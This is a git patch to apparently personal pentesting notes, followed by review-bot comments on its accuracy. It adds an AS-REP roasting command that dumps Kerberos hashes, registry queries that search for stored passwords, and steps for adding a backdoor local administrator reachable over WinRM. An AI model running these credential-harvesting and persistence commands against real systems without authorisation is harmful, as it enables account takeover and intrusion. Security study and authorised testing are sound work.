From 9be912401b05c673a52d965f41d85404f87c1041 Mon Sep 17 00:00:00 2001 From: gurkenhabicht Date: Wed, 21 May 2025 17:27:29 +0200 Subject: [PATCH] added windows enumeration details. --- Enumeration/AS-REP Roasting.md | 12 ++++++ Enumeration/Windows/Powershell.md | 27 +++++++++----- Enumeration/Windows/Registry.md | 9 +++++ Post Exploitation/Windows/Add Users.md | 51 ++++++++++++++++++++++++-- Post Exploitation/Windows/Registry.md | 12 +++++- 5 files changed, 98 insertions(+), 13 deletions(-) create mode 100644 Enumeration/AS-REP Roasting.md create mode 100644 Enumeration/Windows/Registry.md diff --git a/Enumeration/AS-REP Roasting.md b/Enumeration/AS-REP Roasting.md new file mode 100644 index 0000000..eb5b8e2 --- /dev/null +++ b/Enumeration/AS-REP Roasting.md @@ -0,0 +1,12 @@ +# AS-Rep Roating + +AS-Rep Roasting dumps user accounts which did not enable pre-authentication. +This is somewhat similar to Kerberoasting but includes user accounts as well. + +## Usage + +Impacket got `GetNPUsers` to check non pre-authenticated user accounts and find credentials. + +```sh +impacket-GetNPUsers $TARGET_DOMAIN/ -dc-ip $TARGET_DC_IP -usersfile $USERS_FILE -format hashcat -outputfile hashes.txt -no-pass +``` diff --git a/Enumeration/Windows/Powershell.md b/Enumeration/Windows/Powershell.md index 77b6e4b..1cf783e 100644 --- a/Enumeration/Windows/Powershell.md +++ b/Enumeration/Windows/Powershell.md @@ -1,18 +1,23 @@ # Powershell Usage ## Get-Help + ``` -Get-Help Command-Name +Get-Help Command-Name ``` -* Show examples + +Show examples + ``` Get-Help Command-Name -Examples ``` -* Get-Command gets all the cmdlets installed on the current Computer. +Get-Command gets all the cmdlets installed on the current Computer. + ``` Get-Command ``` + ``` Get-Command Verb-* Get-Command Invoke-* 
@@ -20,19 +25,23 @@ Get-Command Get-* ``` ## Passing Output via Pipe -* A pipe passes object including methods and attributes. + + A pipe passes object including methods and attributes. ``` Verb-Noun | Get-Member ``` + ``` Get-Command | Get-Member -MemberType Method ``` ## Creating Objects from Previous Cmdlets + ``` Get-ChildItem | Select-Object -Property Mode, Name ``` + * first - gets the first x object * last - gets the last x object * unique - shows the unique objects @@ -74,7 +83,7 @@ Get-ChildItem | Sort-Object ## Finding a File ``` Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'} -``` +``` ```sh Get-HotFix | Format-list | findstr ``` @@ -111,7 +120,7 @@ Copy-Item ## Count Lines of Output As an example, count all cmdlets on the system ``` -Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object +Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object ``` ## Count Words @@ -129,7 +138,7 @@ Get-FileHash -Algorithm MD5 'C:\Program Files\interesting-file.txt' Get-Location ``` -## File Metadata +## File Metadata ```sh ls | Format-List * ``` @@ -216,7 +225,7 @@ driverquery ### Processes * Start processes -```sh +```sh Start-Process ``` @@ -265,7 +274,7 @@ Get-ACL C:\ ### Port Scanner ``` for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i} -``` +``` ### Ping Hosts ```sh diff --git a/Enumeration/Windows/Registry.md b/Enumeration/Windows/Registry.md new file mode 100644 index 0000000..2829ef1 --- /dev/null +++ b/Enumeration/Windows/Registry.md @@ -0,0 +1,9 @@ +# Registry Enumeration + +## Usage + +Query keys including the string `password` via `reg`. + +```sh +reg query HKLM /f "password" /t REG_SZ /s +``` diff --git a/Post Exploitation/Windows/Add Users.md b/Post Exploitation/Windows/Add Users.md index 797deba..3633538 100644 --- a/Post Exploitation/Windows/Add Users.md +++ b/Post Exploitation/Windows/Add Users.md 
@@ -1,16 +1,61 @@ -# Add user as system user +# Users + +## List Users + +List local users + +``` +net user +``` + +List users of the domain + +``` +net user /domain +``` + +Get more information about a user + +``` +net user Administrator /domain +``` + +## List Groups + +List local groups + +``` +net localgroup +``` + +List groups of the domain + +``` +net group /domain +``` + +Get more information about a group + +``` +net group Administrator /domain +``` + +## Add user as system user + ```sh net user /add ``` + ```sh net localgroup Administrator /add ``` + ```sh net localgroup "Remote Management Users" /add ``` + ```sh net user ``` -* connect via winRM - +connect via winRM afterwards using the new user diff --git a/Post Exploitation/Windows/Registry.md b/Post Exploitation/Windows/Registry.md index 72172f1..f7066ea 100644 --- a/Post Exploitation/Windows/Registry.md +++ b/Post Exploitation/Windows/Registry.md @@ -1,7 +1,17 @@ # Windows Registry ## AutoLogin Password -* Automatic logon password is save in plaintext + +Automatic logon password is save in plaintext + ``` reg query "HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon" ``` + +## Search for Passwords + +Use `reg` to search for passwords inside Keys of the registry via the following line. + +``` +reg query HKLM /f "password" /t REG_SZ /s +```
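Review bot: In the new file Enumeration/AS-REP Roasting.md, the heading "AS-Rep Roating" misspells the technique; it should read "AS-REP Roasting" to match the body text and the file name. The sentence "dumps user accounts which did not enable pre-authentication" is also imprecise: the check is for accounts that have Kerberos pre-authentication disabled, and "similar to Kerberoasting but includes user accounts as well" should say what the difference actually is rather than leaving it to the reader. The `$TARGET_DOMAIN` / `$TARGET_DC_IP` / `$USERS_FILE` placeholder convention used here is good; the other files in this patch should follow it.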
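Review bot: In the Enumeration/Windows/Powershell.md hunk at "## Passing Output via Pipe", the added line "A pipe passes object including methods and attributes." should read "A pipe passes objects, including their methods and properties." (plural, and PowerShell calls them properties, which is also what `Get-Member` reports). The bullet that was removed here is replaced by plain prose, which is consistent with the rest of the hunk.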
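Review bot: In the Enumeration/Windows/Powershell.md hunk at "## Finding a File", only trailing whitespace on the closing fence changes, but the following visible block `Get-HotFix | Format-list | findstr` is missing the search string that `findstr` requires, so it errors as written; a placeholder such as `$PATTERN` in the style of AS-REP Roasting.md would fix it. The file also mixes plain ``` fences with ```sh fences for the same kind of content (here within three lines of each other); pick one, and note that these are PowerShell snippets, so `powershell` is the more accurate tag if one is used.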
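Review bot: The new file Enumeration/Windows/Registry.md contains the same `reg query HKLM /f "password" /t REG_SZ /s` command that this patch also adds under "## Search for Passwords" in Post Exploitation/Windows/Registry.md; keep it in one place and link to it from the other so the two copies cannot drift. The short description should also say that `/t REG_SZ` limits the match to string values and that `/s` recurses the whole hive, since that is what makes the query slow and noisy on a real host.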
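Review bot: In Post Exploitation/Windows/Add Users.md, `net group Administrator /domain` under "## List Groups" names an account, not a group, so the command fails; the "Get more information about a group" example needs an actual group name or a placeholder. Likewise `net localgroup Administrator /add` under "## Add user as system user" refers to the local group, which is named "Administrators", and both it and `net user /add` are missing the account name arguments that `net` requires; using the `$PLACEHOLDER` convention from AS-REP Roasting.md would make these lines copy-paste safe. Minor: "winRM" should be "WinRM", and the heading "system user" is misleading since the steps add a local administrator, not the SYSTEM account.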
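Review bot: In the Post Exploitation/Windows/Registry.md hunk, the visible key path `HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon` is wrong: the key is `Windows NT` with a space, so the query as written reports that the key cannot be found. Also "is save in plaintext" should read "is saved in plaintext", and the sentence should name the values involved (`AutoAdminLogon` and `DefaultPassword`) so a reader knows what to look for in the output and, from the defensive side, what to audit.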